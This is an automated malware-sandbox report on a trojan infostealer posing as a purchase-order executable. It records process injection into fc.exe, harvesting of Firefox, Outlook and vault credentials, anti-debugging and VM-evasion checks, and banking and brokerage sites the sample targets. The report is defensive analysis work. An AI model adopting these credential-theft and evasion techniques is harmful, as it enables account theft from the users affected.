              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038C8DBF4_2_038C8DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038AADE04_2_038AADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BAD004_2_038BAD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0394CD1F4_2_0394CD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03950CB54_2_03950CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A0CF24_2_038A0CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B0C004_2_038B0C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038F739A4_2_038F739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396132D4_2_0396132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0389D34C4_2_0389D34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B52A04_2_038B52A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CB2C04_2_038CB2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039512ED4_2_039512ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038BB1B04_2_038BB1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038E516C4_2_038E516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0389F1724_2_0389F172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0397B16B4_2_0397B16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B70C04_2_038B70C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0395F0CC4_2_0395F0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396F0E04_2_0396F0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039670E94_2_039670E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396F7B04_2_0396F7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039616CC4_2_039616CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038F56304_2_038F5630
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0394D5B04_2_0394D5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039675714_2_03967571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396F43F4_2_0396F43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A14604_2_038A1460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CFB804_2_038CFB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03925BF04_2_03925BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038EDBF94_2_038EDBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FB764_2_0396FB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038F5AA04_2_038F5AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03951AA34_2_03951AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0394DAAC4_2_0394DAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0395DAC64_2_0395DAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03967A464_2_03967A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FA494_2_0396FA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03923A6C4_2_03923A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_039459104_2_03945910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B99504_2_038B9950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CB9504_2_038CB950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B38E04_2_038B38E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0391D8004_2_0391D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B1F924_2_038B1F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FFB14_2_0396FFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03873FD54_2_03873FD5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03873FD24_2_03873FD2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FF094_2_0396FF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B9EB04_2_038B9EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038CFDC04_2_038CFDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038B3D404_2_038B3D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03961D5A4_2_03961D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03967D734_2_03967D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0396FCF24_2_0396FCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03929C324_2_03929C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D1FD04_2_030D1FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CCE804_2_030CCE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CB1C44_2_030CB1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CB1D04_2_030CB1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030C11E74_2_030C11E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CB07F4_2_030CB07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CB0804_2_030CB080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030CD0A04_2_030CD0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D56804_2_030D5680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D387B4_2_030D387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D38804_2_030D3880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030EBCD04_2_030EBCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E2F54_2_0371E2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E7B34_2_0371E7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E57B4_2_0371E57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E4134_2_0371E413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371CB134_2_0371CB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371D8784_2_0371D878
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0392F290 appears 105 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 038F7E54 appears 103 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0389B970 appears 280 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0391EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 038E5130 appears 58 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 0101F290 appears 105 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 00F8B970 appears 280 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 0100EA12 appears 86 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 00FD5130 appears 58 times
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: String function: 00FE7E54 appears 102 times
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: No import functions for PE file found
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000001231000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs PO No. 0146850827805 HSP00598420.exe
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@11/7
              Source: C:\Windows\SysWOW64\fc.exe File created: C:\Users\user\AppData\Local\Temp\17O3k-2I
              Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: fc.exe, 00000004.00000002.3919628546.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3919628546.00000000033F2000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2601065883.00000000033F5000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2601065883.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3919628546.00000000033DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: PO No. 0146850827805 HSP00598420.exeVirustotal: Detection: 69%
              Source: PO No. 0146850827805 HSP00598420.exeReversingLabs: Detection: 68%
              Source: unknownProcess created: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe "C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe"
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe Section loaded: apphelp.dll
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe Section loaded: wininet.dll
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: ulib.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\fc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2417757352.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DlLArodfwUXcDj.exe, 00000003.00000002.3919488077.00000000003FE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.00000000010FE000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2420588892.00000000036C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003870000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2418064008.0000000003518000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: PO No. 0146850827805 HSP00598420.exe, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2326927222.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.00000000010FE000.00000040.00001000.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000003.2324389294.0000000000B15000.00000004.00000020.00020000.00000000.sdmp, PO No. 0146850827805 HSP00598420.exe, 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000004.00000002.3920347727.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2420588892.00000000036C9000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000004.00000002.3920347727.0000000003870000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000004.00000003.2418064008.0000000003518000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F290BB pushad ; iretd 0_2_00F290E4
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F23863 push ss; iretd 0_2_00F23880
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F13490 push eax; ret 0_2_00F13492
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F24DC4 pushfd ; retf 0_2_00F24DCE
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00F909AD push ecx; mov dword ptr [esp], ecx0_2_00F909B6
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084888D1 push cs; retf 3_2_084888DA
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084829C0 push 1537E110h; ret 3_2_084829C8
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0847F1F1 pushfd ; retf 3_2_0847F1FB
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_0848924E push FFFFFFADh; ret 3_2_08489250
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_08489429 push ecx; ret 3_2_0848942A
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084834E8 pushad ; iretd 3_2_08483511
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exeCode function: 3_2_084745A4 pushad ; ret 3_2_084745A5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0387225F pushad ; ret 4_2_038727F9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038727FA pushad ; ret 4_2_038727F9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_038A09AD push ecx; mov dword ptr [esp], ecx4_2_038A09B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0387283D push eax; iretd 4_2_03872858
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03871368 push eax; iretd 4_2_03871369
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DB011 push cs; retf 4_2_030DB01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DBB69 push ecx; ret 4_2_030DBB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D1931 pushfd ; retf 4_2_030D193B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DB98E push FFFFFFADh; ret 4_2_030DB990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DDD8B push eax; iretd 4_2_030DDDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030D5C28 pushad ; iretd 4_2_030D5C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371B3C4 push edi; ret 4_2_0371B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371B3C8 push edi; ret 4_2_0371B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03725202 push eax; ret 4_2_03725204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037171EA push es; ret 4_2_037171EB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371C033 push ss; iretd 4_2_0371C036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371BA5F push cs; retf 4_2_0371BA67
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371AE60 push ds; retf 4_2_0371AE61
              Source: PO No. 0146850827805 HSP00598420.exeStatic PE information: section name: .text entropy: 7.99527207662154
              Source: C:\Windows\SysWOW64\fc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FD096E rdtsc 0_2_00FD096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.7 %
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe TID: 1292 Thread sleep time: -50000s >= -30000s
              Source: C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe TID: 1292 Thread sleep time: -34500s >= -30000s
              Source: C:\Windows\SysWOW64\fc.exe TID: 6592 Thread sleep count: 42 > 30
              Source: C:\Windows\SysWOW64\fc.exe TID: 6592 Thread sleep time: -84000s >= -30000s
              Source: C:\Windows\SysWOW64\fc.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_030DC870 FindFirstFileW,FindNextFileW,FindClose,4_2_030DC870
              Source: 17O3k-2I.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: fc.exe, 00000004.00000002.3922611769.00000000082E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: payments_upi_vpadVMware
              Source: 17O3k-2I.4.drBinary or memory string: discord.comVMware20,11696428655f
              Source: 17O3k-2I.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: 17O3k-2I.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: 17O3k-2I.4.dr, Binary or memory string: global block list test formVMware20,11696428655
              Source: fc.exe, 00000004.00000002.3922611769.00000000082E6000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: outlook.office.comVMware20,
              Source: 17O3k-2I.4.dr, Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: 17O3k-2I.4.dr, Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: fc.exe, 00000004.00000002.3919628546.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz Z
              Source: 17O3k-2I.4.dr, Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: 17O3k-2I.4.dr, Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: 17O3k-2I.4.dr, Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: 17O3k-2I.4.dr, Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: 17O3k-2I.4.dr, Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: 17O3k-2I.4.dr, Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: 17O3k-2I.4.dr, Binary or memory string: outlook.office365.comVMware20,11696428655t
              Source: 17O3k-2I.4.dr, Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: DlLArodfwUXcDj.exe, 00000003.00000002.3920081062.000000000114E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 17O3k-2I.4.dr, Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: 17O3k-2I.4.dr, Binary or memory string: outlook.office.comVMware20,11696428655s
              Source: 17O3k-2I.4.dr, Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: 17O3k-2I.4.dr, Binary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: 17O3k-2I.4.dr, Binary or memory string: AMC password management pageVMware20,11696428655
              Source: 17O3k-2I.4.dr, Binary or memory string: tasks.office.comVMware20,11696428655o
              Source: 17O3k-2I.4.dr, Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: 17O3k-2I.4.dr, Binary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: 17O3k-2I.4.dr, Binary or memory string: interactivebrokers.comVMware20,11696428655
              Source: 17O3k-2I.4.dr, Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: 17O3k-2I.4.dr, Binary or memory string: dev.azure.comVMware20,11696428655j
              Source: 17O3k-2I.4.dr, Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: 17O3k-2I.4.dr, Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: 17O3k-2I.4.dr, Binary or memory string: bankofamerica.comVMware20,11696428655x
              Source: fc.exe, 00000004.00000002.3922611769.00000000082E6000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: dVMware
              Source: 17O3k-2I.4.dr, Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: firefox.exe, 00000006.00000002.2711215552.0000021BB932C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==:
              Source: 17O3k-2I.4.dr, Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe, Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe, Process queried: DebugPort
              Source: C:\Windows\SysWOW64\fc.exe, Process queried: DebugPort
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe, Code function: 0_2_00FD096E rdtsc 0_2_00FD096E
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exe, Code function: 0_2_00F27CA3 LdrLoadDll, 0_2_00F27CA3
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
              Source: C:\Users\user\Desktop\PO No. 0146850827805 HSP00598420.exeCode function: 0_2_00FCE443 mov eax, dword ptr fs:[00000030h]0_2_00FCE443
